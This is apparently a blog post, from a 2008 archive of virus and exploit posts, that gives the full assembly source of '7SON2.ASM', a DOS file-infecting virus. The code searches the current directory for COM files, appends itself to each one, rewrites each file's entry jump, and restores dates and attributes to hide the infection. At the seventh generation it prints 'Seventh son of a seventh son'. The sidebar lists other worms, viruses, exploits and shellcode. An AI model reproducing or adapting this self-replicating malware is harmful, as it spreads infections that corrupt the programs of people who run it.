###################################
#7SON2.ASM
###################################
;****************************************************************************
;* Seventh son of a seventh son version 2
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
FILELEN equ end - start
MINTARGET equ 1000
MAXTARGET equ -(FILELEN+40h)
org 100h
.RADIX 16
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
begin: db 4Dh
jmp start
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: call start2
start2: pop bp
sub bp,0103h
lea si,[bp+offset begbuf-4] ;restore begin of file
mov di,0100h
movsw
movsw
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
mov dx,offset ni24 - 4 ;set new int24 vector
add dx,bp
mov ax,2524h
int 21
lea dx,[bp+offset end] ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
mov word ptr [bp+offset nameptr-4],dx
lea si,[bp+offset grandfather-4] ;check generation
cmp [si],0606h
jne verder
lea dx,[bp+offset sontxt-4] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[si] ;update generations
xchg ah,al
xor al,al
mov [si],ax
lea dx,[bp+offset filename-4] ;find first COM-file
xor cx,cx
mov ah,4Eh
int 21
infloop: mov dx,word ptr [bp+offset nameptr-4]
call infect
mov ah,4Fh ;find next file
int 21
jnc infloop
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
push cs
push cs
pop ds
pop es
mov ax,0100h ;put old start-adres on stack
push ax
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov ax,4300h ;ask attributes
int 21
push cx
xor cx,cx ;clear flags
call setattr
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
lea dx,[bp+offset begbuf-4]
mov ah,3fh
int 21
mov al,byte ptr [bp+begbuf-4] ;already infected?
cmp al,4Dh
je return2
cmp al,5Ah ;or a weird EXE?
je return2
call endptr ;get file-length
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
lea dx,[bp+offset start-4]
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
sub ax,4 ;calculate new start-adres
mov word ptr [bp+newbeg-2],ax
call beginptr ;write new begin of file
mov cx,4
lea dx,[bp+offset newbeg-4]
mov ah,40h
int 21
inc byte ptr [si] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: pop cx ;restore file-attribute
; call setattr
; ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: mov dx,word ptr [bp+offset nameptr-4]
mov ax,4301h
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov ax,4200h ;go to begin of file
jmp short ptrvrdr
endptr: mov ax,4202h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
int 21
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
begbuf db 0CDh, 20h, 0, 0
newbeg db 4Dh, 0E9h, 0, 0
nameptr dw ?
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
grandfather db 0
father db 0
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin
skip to main |
skip to sidebar
Posts
Blog Archive
-
▼
2008
(54)
-
▼
July
(42)
- VBScript Worm
- MATRIX WORM
- E-mail Worms
- Atom bomb virus in c
- chinese virus
- A GodDamn Virus code
- C++ worm, the source code of the blaster worm
- $$$$$$$$$Virus making software$$$$$$$$$
- How to make a Fork Bomb (rabbit virus)
- Virus: MineSweeper.cpp
- XSS Attack - Yahoo! Worm - Mail PoC
- Batch Hacks/Viruses
- How to send batch virus with a cd
- Archer Virus Source code
- Linksys WRT54G (firmware 1.00.9) Security Bypass
- uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range...
- LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit
- Alt-N SecurityGateway 1.00-1.01 Remote Stack Overf...
- XChat <= 2.8.7b (URI Handler) Remote Code Executio...
- muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Re...
- XnView 1.93.6 for Windows .taac Local Buffer Overf...
- Scientific Image DataBase <= 0.41 Blind SQL Inject...
- screen 4.0.3 Local Authentication Bypass Vulnerabi...
- Deterministic Network Enhancer dne2000.sys kernel ...
- Symantec Altiris Client Service 6.8.378 Local Priv...
- Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow ...
- PHP-Fusion Mod classifieds (lid) Remote SQL Inject...
- SePortal 2.4 (poll.php poll_id) Remote SQL Injecti...
- OTManager CMS 2.4 Insecure Cookie Handling Vulnera...
- W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remo...
- OTManager CMS 24a (LFI/XSS) Multiple Remote Vulner...
- PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vuln...
- win32 Download and Execute Shellcode Generator (br...
- aix-execve-binsh1.c
- alpha-execve1.c
- win32 Tiny Download and Exec Shellcode 192 bytes
- BlackBat Virus - Non Destructive
- Shadow Virus - Non Destructive
- 1ST_STAR.ASM
- melissa
- mawanella (original)
- 7SON2.ASM Virus
-
▼
July
(42)
No comments:
Post a Comment